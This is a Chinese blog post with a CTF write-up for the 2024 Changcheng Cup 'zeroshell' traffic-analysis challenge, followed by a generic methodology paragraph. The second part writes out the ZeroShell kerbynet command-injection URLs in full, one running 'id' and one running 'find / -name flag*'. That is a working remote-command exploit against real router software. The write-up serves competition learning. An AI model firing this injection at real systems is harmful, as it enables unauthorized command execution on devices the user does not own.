2024长城杯威胁检测与网络流量分析

zeroshell_1

他告诉了写出会话中设置的flag,那就是流量里有flag的标示或者有被加密后flag标识

通过数据包搜索分组字节流,找flag没找到,找flag的base64编码,找到流量

追踪流,解码ZmxhZ3s2QzJFMzhEQS1EOEU0LThEODQtNEE0Ri1FMkFCRDA3QTFGM0F9得到flag{6C2E38DA-D8E4-8D84-4A4F-E2ABD07A1F3A}

zeroshell_2

第一题告诉了我们那个flag的地方就是攻击者利用漏洞开展攻击的流量

这个是注入看进程,直接拿他的payload开用,在执行框搜用find / -name flag

/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Afind%20/%20-name%20flag*%0A%27

找到flag{c6045425-6e6e-41d0-be09-95682a4f65c4}

对于2024长城杯中的流量分析题目,这类比赛通常涉及网络安全领域的技能挑战,包括但不限于网络协议理解、加密解密技巧以及数据分析能力等。针对具体的流量分析题目的解答解析,一般会涵盖以下几个方面的方法论: 识别使用的协议和技术 要正确解读捕获的数据包,需要先确定所用的网络协议(例如HTTP, HTTPS, FTP等)。这有助于了解数据传输的方式及可能存在的安全措施。 过滤和提取关键信息 利用Wireshark或其他类似工具来筛选出感兴趣的特定类型的流量或者异常活动记录。可以设置复杂的显示过滤器以聚焦于某些特征字段上的值。 逆向工程和模式匹配 当面对经过编码或压缩的内容时,尝试找出其背后的算法逻辑或是重复出现的数据结构特点。有时还需要结合已有的公开资源做对比研究。 密码破解尝试 如果遇到加密过的通信流,则需考虑是否能通过暴力攻击、字典查找或者其他更高级的技术手段恢复原始消息文本。 脚本编写辅助处理 为了提高效率,在必要情况下应当编写自动化脚本来批量处置大量相似性质的日志条目;Python是此类工作的常用编程语言之一。 请注意,实际比赛中提供的具体案例会有不同的侧重点,并且官方可能会给出一些提示帮助参赛者更快地找到解决方案路径。由于目前没有直接获取到有关该赛事的具体流量分析题目的详细内容,以上建议较为泛化。若想获得更加针对性的帮助,建议参考往届赛题、参相关的在线论坛讨论或者是加入专门的兴趣小组交流经验心得。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值